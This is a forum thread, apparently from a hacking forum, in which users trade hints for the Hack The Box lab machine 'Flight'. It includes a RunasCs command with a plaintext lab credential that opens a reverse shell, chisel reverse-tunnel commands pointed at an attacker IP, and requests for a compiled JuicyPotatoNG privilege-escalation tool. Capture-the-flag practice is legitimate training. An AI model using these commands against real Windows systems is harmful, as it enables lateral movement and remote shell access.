(November 9, 2022, 08:08 AM)hacker9999 Wrote:

(November 8, 2022, 05:26 PM)CyberBandit Wrote:

(November 6, 2022, 03:50 PM)hacker9999 Wrote: Anyone have idea after getting a reverse shell as svc_apache?

same here  😕
the writeup does mention the "runas" command, I have checked the blog , can't seem to find the right combination

runas.exe c.bum Tikkycoll_431012284 powershell -r ip:port
https://github.com/antonioCoco/RunasCs

You need to upload runas.exe to svc_apache, like Desktop

thanks @hacker9999

---

(November 9, 2022, 04:16 AM)deer Wrote:

(November 8, 2022, 05:26 PM)CyberBandit Wrote:

(November 6, 2022, 03:50 PM)hacker9999 Wrote: Anyone have idea after getting a reverse shell as svc_apache?

same here  😕
the writeup does mention the "runas" command, I have checked the blog , can't seem to find the right combination

runas.exe c.bum Tikkycoll_431012284 powershell -r ip:port
https://github.com/antonioCoco/RunasCs

What writeup?

https://breached.to/Thread-Flight-HTB-Write-Up

(November 8, 2022, 05:26 PM)CyberBandit Wrote:

(November 6, 2022, 03:50 PM)hacker9999 Wrote: Anyone have idea after getting a reverse shell as svc_apache?

same here  😕
the writeup does mention the "runas" command, I have checked the blog , can't seem to find the right combination

runas.exe c.bum Tikkycoll_431012284 powershell -r ip:port
https://github.com/antonioCoco/RunasCs

.
unascs.exe -d flight.htb "c.bum" Tikkycoll_431012284 cmd.exe -r ip:port

---

(November 9, 2022, 11:12 AM)abcbbxhdhd Wrote: Can someone share their method of port forwarding to access the website on 8000?

on your machine:
./chisel_1.7.7_linux_amd64 server --reverse --port 1234
(you will see that reverse tunnelling enabled, fingerprint, listening on http://0.0.0.0:1234)

on target machine in C:\Windows\Temp or C:\Windows\Tasks:
./chisel.exe client 10.10.14.69:1234 R:8000:127.0.0.1:8000
(you will see on your machine the session start proxy#R:8000=>8000: Listening)

now just open http://127.0.0.1:8000 in your browser.

I don't believe port forwarding is necessary for privesc by the way.

(November 10, 2022, 02:35 AM)deer Wrote:

(November 8, 2022, 05:26 PM)CyberBandit Wrote:

(November 6, 2022, 03:50 PM)hacker9999 Wrote: Anyone have idea after getting a reverse shell as svc_apache?

same here  😕
the writeup does mention the "runas" command, I have checked the blog , can't seem to find the right combination

runas.exe c.bum Tikkycoll_431012284 powershell -r ip:port
https://github.com/antonioCoco/RunasCs

.
unascs.exe -d flight.htb "c.bum" Tikkycoll_431012284 cmd.exe -r ip:port

---

(November 9, 2022, 11:12 AM)abcbbxhdhd Wrote: Can someone share their method of port forwarding to access the website on 8000?

on your machine:
./chisel_1.7.7_linux_amd64 server --reverse --port 1234
(you will see that reverse tunnelling enabled, fingerprint, listening on http://0.0.0.0:1234)

on target machine in C:\Windows\Temp or C:\Windows\Tasks:
./chisel.exe client 10.10.14.69:1234 R:8000:127.0.0.1:8000
(you will see on your machine the session start proxy#R:8000=>8000: Listening)

now just open http://127.0.0.1:8000 in your browser.

I don't believe port forwarding is necessary for privesc by the way.

my nmap scan didn't come up with Port 8000, would be good to how this attack vector was discovered? BTW what service is running on Port 8000?

Hi everybody. PLS help with compilled script JuicyPotatoNG.exe Thanks advance.

Can someone share a working version of "JuicyPotatoNG.exe"? Compiled it with Visual Studio but my version seems not working...

Anyone got JuicyPotatong. exe?